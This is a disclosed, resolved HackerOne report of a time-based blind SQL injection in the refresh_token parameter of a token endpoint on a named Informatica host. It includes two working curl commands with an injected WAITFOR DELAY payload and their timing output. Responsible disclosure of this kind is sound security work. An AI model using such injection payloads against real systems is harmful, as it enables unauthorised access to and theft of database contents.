Blind SQL injection at tsftp.informatica.com

Disclosed: 2020-11-16 10:32:06 By r1pley To informatica
Critical
Vulnerability Details
The parameter `refresh_token` sent to the REST path /api/v1/token is vulnerable to blind SQL injection. Compare the response time of these 2 requests: ``` $ time curl -X POST "https://tsftp.informatica.com/api/v1/token" -H "accept: application/json" -H "Content-Type: application/x-www-form-urlencoded" -d "grant_type=refresh_token&refresh_token='; WAITFOR DELAY '0:0:1'--" {"error":"invalid_grant"}curl -X POST "https://tsftp.informatica.com/api/v1/token" -H -H -d 0.02s user 0.01s system 1% cpu 2.048 total ``` vs ``` $ time curl -X POST "https://tsftp.informatica.com/api/v1/token" -H "accept: application/json" -H "Content-Type: application/x-www-form-urlencoded" -d "grant_type=refresh_token&refresh_token='; WAITFOR DELAY '0:0:13'--" {"error":"invalid_grant"}curl -X POST "https://tsftp.informatica.com/api/v1/token" -H -H -d 0.02s user 0.01s system 0% cpu 14.045 total ``` and notice that the WAITFOR DELAY command is executed. ## Impact Blind SQL injection can be exploited to exfiltrate data from the FTP server, bypass authentication or for remote code execution. I stopped my testing at the time-based PoC because I didn't want to risk accessing sensitive data. If you would like to though, I can continue exploiting this vulnerability to present the above impact in practice, eg by getting the database version string.
Actions
View on HackerOne
Report Stats
  • Report ID: 1034625
  • State: Closed
  • Substate: resolved
  • Upvotes: 66
Share this report